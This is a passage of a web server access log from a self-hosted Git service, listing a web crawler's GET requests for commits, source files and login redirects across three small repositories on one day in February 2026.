+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10857] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.7" [Client 216.73.216.188] [Length 21159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2F.TemporaryDocument%2Fapp.js" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 22642] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2FQUICKSTART.md" [Client 216.73.216.188] [Length 28169] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=rendered" [Client 216.73.216.188] [Length 11168] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.4" [Client 216.73.216.188] [Length 37170] [Gzip 7.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fmain.py" [Client 216.73.216.188] [Length 36338] [Gzip 7.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 10046] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=rendered" [Client 216.73.216.188] [Length 11168] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" [Client 216.73.216.188] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FServices.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2Findex.html" [Client 216.73.216.188] [Length 20224] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9785] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Ffind%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11881] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2Fprojects.sln" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Febd2be03a23e76e126207d40a257d72f40ab9a7c...main" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FOpcUaMinimal.csproj" [Client 216.73.216.188] [Length 21829] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11779] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fapp%2Fcalculator.py" [Client 216.73.216.188] [Length 26171] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 18197] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 216.73.216.188] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.vscode%2Flaunch.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 10903] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11307] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fupdate_status.py" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Findex.tsx" [Client 216.73.216.188] [Length 23433] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Ftemplates%2Findex.html" [Client 216.73.216.188] [Length 29215] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 216878] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 945] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 216.73.216.188] [Length 772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16097] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10834] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 17705] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2FProperties%2FlaunchSettings.json" [Client 216.73.216.188] [Length 21742] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11299] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10840] [Gzip 